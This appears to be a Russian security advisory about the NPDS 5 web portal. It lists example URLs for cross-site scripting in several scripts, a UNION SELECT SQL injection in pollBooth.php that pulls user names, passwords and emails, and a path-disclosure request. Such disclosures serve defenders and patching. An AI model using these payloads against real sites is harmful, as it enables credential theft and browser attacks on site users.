Программа: NPDS 5

Обнаруженные уязвимости позволяют
удаленному пользователю произвести XSS
нападение и выполнить произвольные SQL
команды в базе данных приложения.
Межсайтовый скриптинг возможен из-за
некорректной обработки входных данных в
различных сценариях. Удаленный
пользователь может с помощью специально
сформированного URL выполнить произвольный
HTML сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.

Примеры:

http://[target]/narval/search.php?query="><hr>

http://[target]/narval/pollBooth.php?op=results& thold=&mode=&order="<hr>&pollID=2

http: //[target]/narval/sdv.php?sdv=<script>alert( )</script>

http://[target]/narval/memberslist.php?letter=& sortby="[XSS]&list=

http://[target]/narval/user.php?op=userinfo &uname=[xss]

http://[target]/narval/powerpack.php?op= instant_message&to_userid=[XSS]

http://[target]/narval/faq.php?myfaq=yes& id_cat=99&categories=[xss]

SQL-инъекция возможна из-за недостаточной
фильтрации данных в параметре thold сценария 'pollBooth.php'.
Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольные SQL команды в базе данных
приложения.

Пример:

http://[target]/narval/pollBooth.php?op=results&thold=0 UNION SELECT
name,pass, email, user_from, user_journal, user_msnm, femail, uid, uname,
commentmax,theme, user_viewemail FROM users

Удаленный пользователь может с помощью
специально сформированного URL получить
данные об установочной директории
приложения.

Пример:

http://[target]/narval/pollBooth.php?op=results&thold=[' ]&mode=thread&
order=0&pollID=2

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии